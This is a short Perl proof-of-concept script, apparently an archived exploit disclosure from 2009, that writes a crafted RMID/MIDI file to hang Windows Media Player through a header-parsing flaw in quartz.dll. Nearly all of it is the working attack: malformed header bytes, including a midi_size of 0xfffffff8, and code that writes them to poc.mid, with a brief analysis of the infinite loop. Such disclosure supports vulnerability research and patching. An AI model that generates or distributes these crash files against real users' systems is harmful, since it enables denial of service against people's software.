#!/usr/bin/perl
# CAL_quartz_mid_poc.pl
#
# MircoSoft_Media_player_quartz.dll_mid_remote_Dos POC
# by Code Audit Labs public 2009-04-17
# http://www.vulnhunt.com/
#
#Affected
#========
#test on full updated winxp sp3
#windows media Player 10.00.00.3998 quartz.dll 6.5.3790.4283
#Windows Media Player 11.0.5721.5230 quartz.dll 6.5.2600.5596

#other version should be affected

# CVE: please assign to this a CVE id 
#
#ANALYSIS
#========
#  one vulnerability exists within the quartz.dll code processing RMID header
#the struct have following
#{
#  char riff_id[4]; //'RIFF'
#  DWORD rmid_size;
#  char rmid_id[4]; //'RMID'
#  char data_id[4]; //no eq data
#  DWORD midi_size; 
#}
#if  data_id is not 'data' , and midi_size is 0xfffffff8.
#the code would fall into infinity loop.

#

open(Fin, ">poc.mid") || die "can't create crash sample.$!";
binmode(Fin);
$data =  
"\x52\x49\x46\x46\xff\xff\x00\x00\x52\x4d\x49\x44\x64\x64\x64\x64" .
"\xf8\xff\xff\xff\x4d\x54\x68\x64\xff\xff\xff\xff\xf8\xff\xff\xf8" .
"\xf8\xff\xff\xff\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" .
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" .
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";

print Fin $data;

close(Fin);

# milw0rm.com [2009-04-17]